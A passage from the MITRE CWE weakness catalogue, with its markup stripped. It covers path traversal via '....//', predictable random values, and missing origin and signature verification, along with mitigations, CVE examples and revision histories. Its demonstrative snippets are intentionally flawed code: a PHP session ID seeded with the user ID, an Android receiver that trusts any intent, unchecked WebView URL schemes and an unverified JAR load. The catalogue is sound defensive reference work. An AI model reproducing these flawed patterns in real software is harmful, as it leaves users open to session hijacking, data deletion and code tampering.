vary widely. Within the developer and other + communities, "randomness" is used heavily. However, within + cryptography, "entropy" is distinct, typically implied as a + measurement. There are no commonly-used definitions, even within + standards documents and cryptography papers. Future versions of + CWE will attempt to define these terms and, if necessary, + distinguish between them in ways that are appropriate for + different communities but do not reduce the usability of CWE for + mapping, understanding, or other scenarios. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Maintenance_Notes, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2009-12-28 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-06-21 + updated Observed_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Potential_Mitigations, References + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, References, Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Type + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2021-07-20 + updated Demonstrative_Examples, Description, Maintenance_Notes, Observed_Examples, Potential_Mitigations, References + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize '....//' (doubled dot dot slash) sequences that can resolve to a location that is outside of that directory. + + This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory. + The '....//' manipulation is useful for bypassing some path traversal protection schemes. If "../" is filtered in a sequential fashion, as done by some regular expression engines, then "....//" can collapse into the "../" unsafe value (CWE-182). It could also be useful when ".." is removed, if the operating system treats "//" and "/" as equivalent. + + + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Read Files or Directories + Modify Files or Directories + + + + + Automated Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Source code Weakness Analyzer + Context-configured Source Code Weakness Analyzer + + + + SOAR Partial + + + Architecture or Design Review + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) + Formal Methods / Correct-By-Construction + + + + High + + + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434. + Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string. + + High + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + CVE-2004-1670 + Mail server allows remote attackers to create arbitrary directories via a ".." or rename arbitrary files via a "....//" in user supplied parameters. + https://www.cve.org/CVERecord?id=CVE-2004-1670 + + + + + '....//' (doubled dot dot slash) + + + SFP16 + Path Traversal + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This could occur due to a cleansing error that removes a single "../" from "....//" + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Relationship_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-06-21 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2010-12-13 + updated Relationships + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2021-03-15 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Path Issue - Doubled Dot Dot Slash - '....//' + + + + The product uses a scheme that generates numbers or identifiers that are more predictable than required. + + + + + + Architecture and Design + + + Implementation + + + + + Other + Varies by Context + + + + + Predictability problems + + + 11 + Brute Force + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + As of CWE 4.5, terminology related to randomness, entropy, and + predictability can vary widely. Within the developer and other + communities, "randomness" is used heavily. However, within + cryptography, "entropy" is distinct, typically implied as a + measurement. There are no commonly-used definitions, even within + standards documents and cryptography papers. Future versions of + CWE will attempt to define these terms and, if necessary, + distinguish between them in ways that are appropriate for + different communities but do not reduce the usability of CWE for + mapping, understanding, or other scenarios. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-02-16 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Name, Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Predictability Problems + + + + A number or object is predictable based on observations that the attacker can make about the state of the system or network, such as time, process ID, etc. + + + + + + + + + Architecture and Design + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Other + Varies by Context + This weakness could be exploited by an attacker in a number ways depending on the context. If a predictable number is used to generate IDs or keys that are used within protection mechanisms, then an attacker could gain unauthorized access to the system. If predictable filenames are used for storing sensitive information, then an attacker might gain access to the system and may be able to gain access to the information in the file. + + + + + Implementation + Increase the entropy used to seed a PRNG. + + + Architecture and Design + Requirements + Libraries or Frameworks + Use products or modules that conform to FIPS 140-2 [REF-267] to avoid obvious entropy problems. Consult FIPS 140-2 Annex C ("Approved Random Number Generators"). + + + Implementation + Use a PRNG that periodically re-seeds itself using input from high-quality sources, such as hardware devices with high entropy. However, do not re-seed too frequently, or else the entropy source might block. + + + + + This code generates a unique random identifier for a user's session. + + function generateSessionID($userID){srand($userID);return rand();} + + Because the seed for the PRNG is always the user's ID, the session ID will always be the same. An attacker could thus predict any user's session ID and potentially hijack the session. + This example also exhibits a Small Seed Space (CWE-339). + + + + + CVE-2002-0389 + Mail server stores private mail messages with predictable filenames in a world-executable directory, which allows local users to read private mailing list archives. + https://www.cve.org/CVERecord?id=CVE-2002-0389 + + + CVE-2001-1141 + PRNG allows attackers to use the output of small PRNG requests to determine the internal state information, which could be used by attackers to predict future pseudo-random numbers. + https://www.cve.org/CVERecord?id=CVE-2001-1141 + + + CVE-2000-0335 + DNS resolver library uses predictable IDs, which allows a local attacker to spoof DNS query results. + https://www.cve.org/CVERecord?id=CVE-2000-0335 + + + CVE-2005-1636 + MFV. predictable filename and insecure permissions allows file modification to execute SQL queries. + https://www.cve.org/CVERecord?id=CVE-2005-1636 + + + + + Predictable from Observable State + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + As of CWE 4.5, terminology related to randomness, entropy, and + predictability can vary widely. Within the developer and other + communities, "randomness" is used heavily. However, within + cryptography, "entropy" is distinct, typically implied as a + measurement. There are no commonly-used definitions, even within + standards documents and cryptography papers. Future versions of + CWE will attempt to define these terms and, if necessary, + distinguish between them in ways that are appropriate for + different communities but do not reduce the usability of CWE for + mapping, understanding, or other scenarios. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2009-12-28 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-06-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Potential_Mitigations, References + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, References, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + + + + An exact value or random number can be precisely predicted by observing previous values. + + + + + + + + + Architecture and Design + + + Implementation + + + + + Other + Varies by Context + + + + + Increase the entropy used to seed a PRNG. + + + Architecture and Design + Requirements + Libraries or Frameworks + Use products or modules that conform to FIPS 140-2 [REF-267] to avoid obvious entropy problems. Consult FIPS 140-2 Annex C ("Approved Random Number Generators"). + + + Implementation + Use a PRNG that periodically re-seeds itself using input from high-quality sources, such as hardware devices with high entropy. However, do not re-seed too frequently, or else the entropy source might block. + + + + + CVE-2002-1463 + Firewall generates easily predictable initial sequence numbers (ISN), which allows remote attackers to spoof connections. + https://www.cve.org/CVERecord?id=CVE-2002-1463 + + + CVE-1999-0074 + Listening TCP ports are sequentially allocated, allowing spoofing attacks. + https://www.cve.org/CVERecord?id=CVE-1999-0074 + + + CVE-1999-0077 + Predictable TCP sequence numbers allow spoofing. + https://www.cve.org/CVERecord?id=CVE-1999-0077 + + + CVE-2000-0335 + DNS resolver uses predictable IDs, allowing a local user to spoof DNS query results. + https://www.cve.org/CVERecord?id=CVE-2000-0335 + + + + + Predictable Exact Value from Previous Values + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + As of CWE 4.5, terminology related to randomness, entropy, and + predictability can vary widely. Within the developer and other + communities, "randomness" is used heavily. However, within + cryptography, "entropy" is distinct, typically implied as a + measurement. There are no commonly-used definitions, even within + standards documents and cryptography papers. Future versions of + CWE will attempt to define these terms and, if necessary, + distinguish between them in ways that are appropriate for + different communities but do not reduce the usability of CWE for + mapping, understanding, or other scenarios. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2009-12-28 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-06-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Potential_Mitigations, References + + + CWE Content Team + MITRE + 2012-05-11 + updated Observed_Examples, References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, References + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product's random number generator produces a series of values which, when observed, can be used to infer a relatively small range of possibilities for the next value that could be generated. + The output of a random number generator should not be predictable based on observations of previous values. In some cases, an attacker cannot predict the exact value that will be produced next, but can narrow down the possibilities significantly. This reduces the amount of effort to perform a brute force attack. For example, suppose the product generates random numbers between 1 and 100, but it always produces a larger value until it reaches 100. If the generator produces an 80, then the attacker knows that the next value will be somewhere between 81 and 100. Instead of 100 possibilities, the attacker only needs to consider 20. + + + + + + + + + Architecture and Design + + + Implementation + + + + + Other + Varies by Context + + + + + Increase the entropy used to seed a PRNG. + + + Architecture and Design + Requirements + Libraries or Frameworks + Use products or modules that conform to FIPS 140-2 [REF-267] to avoid obvious entropy problems. Consult FIPS 140-2 Annex C ("Approved Random Number Generators"). + + + Implementation + Use a PRNG that periodically re-seeds itself using input from high-quality sources, such as hardware devices with high entropy. However, do not re-seed too frequently, or else the entropy source might block. + + + + + Predictable Value Range from Previous Values + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + As of CWE 4.5, terminology related to randomness, entropy, and + predictability can vary widely. Within the developer and other + communities, "randomness" is used heavily. However, within + cryptography, "entropy" is distinct, typically implied as a + measurement. There are no commonly-used definitions, even within + standards documents and cryptography papers. Future versions of + CWE will attempt to define these terms and, if necessary, + distinguish between them in ways that are appropriate for + different communities but do not reduce the usability of CWE for + mapping, understanding, or other scenarios. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-03-10 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2009-12-28 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-06-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Potential_Mitigations, References + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, References + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses a constant value, name, or reference, but this value can (or should) vary across different environments. + + + + + + Primary + + + Resultant + + + + + + + + Architecture and Design + + + Implementation + + + + + Other + Varies by Context + + + + + CVE-2002-0980 + Component for web browser writes an error message to a known location, which can then be referenced by attackers to process HTML/script in a less restrictive context + https://www.cve.org/CVERecord?id=CVE-2002-0980 + + + + + Static Value in Unpredictable Context + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + overlaps default configuration. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Relationship_Notes, Relevant_Properties, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2009-03-10 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2009-12-28 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-02-16 + updated Relationships + + + CWE Content Team + MITRE + 2010-06-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-12-13 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Potential_Mitigations, References + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Other_Notes + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, References, Relevant_Properties + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Static Value in Unpredictable Context + + + + The product does not sufficiently verify the origin or authenticity of data, in a way that causes it to accept invalid data. + + + + + + + + + + Architecture and Design + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Integrity + Other + Varies by Context + Unexpected State + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + In 2022, the OT:ICEFALL study examined products by 10 different Operational Technology (OT) vendors. The researchers reported 56 vulnerabilities and said that the products were "insecure by design" [REF-1283]. If exploited, these vulnerabilities often allowed adversaries to change how the products operated, ranging from denial of service to changing the code that the products executed. Since these products were often used in industries such as power, electrical, water, and others, there could even be safety implications. + Multiple vendors did not sign firmware images. + + + + + CVE-2022-30260 + Distributed Control System (DCS) does not sign firmware images and only relies on insecure checksums for integrity checks + https://www.cve.org/CVERecord?id=CVE-2022-30260 + + + CVE-2022-30267 + Distributed Control System (DCS) does not sign firmware images and only relies on insecure checksums for integrity checks + https://www.cve.org/CVERecord?id=CVE-2022-30267 + + + CVE-2022-30272 + Remote Terminal Unit (RTU) does not use signatures for firmware images and relies on insecure checksums + https://www.cve.org/CVERecord?id=CVE-2022-30272 + + + + + Insufficient Verification of Data + + + A3 + Broken Authentication and Session Management + CWE More Specific + + + 12 + Content Spoofing + + + + + + + + + + + + + + + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + "origin validation" could fall under this. + The specific ways in which the origin is not properly identified should be laid out as separate weaknesses. In some sense, this is more like a category. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Maintenance_Notes, Relationships, Relationship_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2009-07-27 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-02-16 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-04-05 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-12-13 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2013-07-17 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Applicable_Platforms, Demonstrative_Examples, Description, Observed_Examples, References, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Insufficient Verification of Data + + + + The product does not properly verify that the source of data or communication is valid. + + + + + + + + Primary + + + Resultant + + + + + + + + Architecture and Design + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Access Control + Other + Gain Privileges or Assume Identity + Varies by Context + An attacker can access any functionality that is inadvertently accessible to the source. + + + + + This Android application will remove a user account when it receives an intent to do so: + + IntentFilter filter = new IntentFilter("com.example.RemoveUser");MyReceiver receiver = new MyReceiver();registerReceiver(receiver, filter); + public class DeleteReceiver extends BroadcastReceiver {@Overridepublic void onReceive(Context context, Intent intent) {int userID = intent.getIntExtra("userID");destroyUserData(userID);}} + + This application does not check the origin of the intent, thus allowing any malicious application to remove a user. Always check the origin of an intent, or create an allowlist of trusted applications using the manifest.xml file. + + + These Android and iOS applications intercept URL loading within a WebView and perform special actions if a particular URL scheme is used, thus allowing the Javascript within the WebView to communicate with the application: + + + // Android + @Overridepublic boolean shouldOverrideUrlLoading(WebView view, String url){ + if (url.substring(0,14).equalsIgnoreCase("examplescheme:")){if(url.substring(14,25).equalsIgnoreCase("getUserInfo")){writeDataToView(view, UserData);return false;}else{return true;}} + } + + + + // iOS + -(BOOL) webView:(UIWebView *)exWebView shouldStartLoadWithRequest:(NSURLRequest *)exRequest navigationType:(UIWebViewNavigationType)exNavigationType{ + NSURL *URL = [exRequest URL];if ([[URL scheme] isEqualToString:@"exampleScheme"]){ + NSString *functionString = [URL resourceSpecifier];if ([functionString hasPrefix:@"specialFunction"]){ + + + // Make data available back in webview. + UIWebView *webView = [self writeDataToView:[URL query]]; + }return NO; + }return YES; + } + + A call into native code can then be initiated by passing parameters within the URL: + + window.location = examplescheme://method?parameter=value + + Because the application does not check the source, a malicious website loaded within this WebView has the same access to the API as a trusted site. + + + + + CVE-2000-1218 + DNS server can accept DNS updates from hosts that it did not query, leading to cache poisoning + https://www.cve.org/CVERecord?id=CVE-2000-1218 + + + CVE-2005-0877 + DNS server can accept DNS updates from hosts that it did not query, leading to cache poisoning + https://www.cve.org/CVERecord?id=CVE-2005-0877 + + + CVE-2001-1452 + DNS server caches glue records received from non-delegated name servers + https://www.cve.org/CVERecord?id=CVE-2001-1452 + + + CVE-2005-2188 + user ID obtained from untrusted source (URL) + https://www.cve.org/CVERecord?id=CVE-2005-2188 + + + CVE-2003-0174 + LDAP service does not verify if a particular attribute was set by the LDAP server + https://www.cve.org/CVERecord?id=CVE-2003-0174 + + + CVE-1999-1549 + product does not sufficiently distinguish external HTML from internal, potentially dangerous HTML, allowing bypass using special strings in the page title. Overlaps special elements. + https://www.cve.org/CVERecord?id=CVE-1999-1549 + + + CVE-2003-0981 + product records the reverse DNS name of a visitor in the logs, allowing spoofing and resultant XSS. + https://www.cve.org/CVERecord?id=CVE-2003-0981 + + + + + Origin Validation Error + + + Part 3-3 + Req SR2.12 RE(1) + + + Part 4-1 + Req SD-1 + + + Part 4-1 + Req SR-2 + + + Part 4-1 + Req SVV-1 + + + Part 4-2 + Req CR2.12 RE(1) + + + Part 4-2 + Req CR3.1 RE(1) + + + + + + + + + + + + + + + + + + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + This entry has some significant overlap with other CWE entries and may need some clarification. See terminology notes. + The "Origin Validation Error" term was originally used in a 1995 thesis [REF-324]. Although not formally defined, an issue is considered to be an origin validation error if either (1) "an object [accepts] input from an unauthorized subject," or (2) "the system [fails] to properly or completely authenticate a subject." A later section says that an origin validation error can occur when the system (1) "does not properly authenticate a user or process" or (2) "does not properly authenticate the shared data or libraries." The only example provided in the thesis (covered by OSVDB:57615) involves a setuid program running command-line arguments without dropping privileges. So, this definition (and its examples in the thesis) effectively cover other weaknesses such as CWE-287 (Improper Authentication), CWE-285 (Improper Authorization), and CWE-250 (Execution with Unnecessary Privileges). There appears to be little usage of this term today, except in the SecurityFocus vulnerability database, where the term is used for a variety of issues, including web-browser problems that allow violation of the Same Origin Policy and improper validation of the source of an incoming message. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2009-05-27 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-12-13 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2014-02-18 + updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Maintenance_Notes, References, Relationship_Notes, Relationships, Terminology_Notes + + + CWE Content Team + MITRE + 2014-06-23 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, References, Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Demonstrative_Examples, Terminology_Notes + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Type + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + + "Mapping CWE to 62443" Sub-Working Group + CWE-CAPEC ICS/OT SIG + 2023-04-25 + Suggested mappings to ISA/IEC 62443. + + + + + The product does not verify, or incorrectly verifies, the cryptographic signature for data. + + + + + + + + + + Architecture and Design + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Access Control + Integrity + Confidentiality + Gain Privileges or Assume Identity + Modify Application Data + Execute Unauthorized Code or Commands + An attacker could gain access to sensitive data and possibly execute unauthorized code. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + In the following code, a JarFile object is created from a downloaded file. + + File f = new File(downloadedFilePath);JarFile jf = new JarFile(f); + + The JAR file that was potentially downloaded from an untrusted source is created without verifying the signature (if present). An alternate constructor that accepts a boolean verify parameter should be used instead. + + + + + CVE-2002-1796 + Does not properly verify signatures for "trusted" entities. + https://www.cve.org/CVERecord?id=CVE-2002-1796 + + + CVE-2005-2181 + Insufficient verification allows spoofing. + https://www.cve.org/CVERecord?id=CVE-2005-2181 + + + CVE-2005-2182 + Insufficient verification allows 